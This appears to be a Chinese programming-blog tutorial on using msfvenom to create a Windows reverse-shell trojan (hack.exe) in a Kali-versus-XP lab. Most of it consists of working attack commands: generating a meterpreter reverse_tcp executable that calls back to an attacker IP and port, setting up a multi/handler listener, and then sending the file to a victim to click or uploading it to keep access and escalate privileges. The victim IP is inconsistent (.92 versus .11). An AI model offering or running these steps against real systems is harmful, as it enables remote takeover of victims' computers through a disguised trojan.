欢迎您访问 最编程 本站为您分享编程语言代码,编程技术文章!
您现在的位置是: 首页

使用msfvenom在Windows上创建反弹shell的方法

最编程 2024-08-04 14:58:22
...


msfvenom生成反弹shell

实验环境:攻击机器 kali 192.168.43.90 (利用msfvenom 生成一个hack.exe反弹shell的木马)

                受害者机器 xp 32位  192.168.43.92

1、先查找使用的具体语句

可以先进入msf中利用search 进行搜索具体的使用语句(payload/windows/meterpreter/reverse_tcp 默认是攻击x86的windows机器,如需要攻击x64的windows机器可以利用payload/windows/x64/meterpreter/reverse_tcp,本次攻击的是)

msf5 > search meterpreter/reverse_tcp

2、利用msfvenom 生成一个hack.exe反弹shell的木马

root@kali:~#msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.43.90 LPORT=4444 -f exe -o hack.exe

其中LHOST是攻击发起者的IP,LPORT是受害者将要连接的攻击者打开的端口


3、再再kali里面打开一个窗口,利用multi/handler进行监听来自受害者192.168.43.11的反弹过来的shell

msf5> use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set LHOST=192.168.43.90

set LPORT=4444


监听等待

(后续发现前面生成的4444端口的hack.exe有点问题,就重新用55555端口的重新生成了一个)

4、把hack.exe发送给受害者进行点击(或者利用文件上传进行上传上去,并执行,用于权限维持和提权)



推荐阅读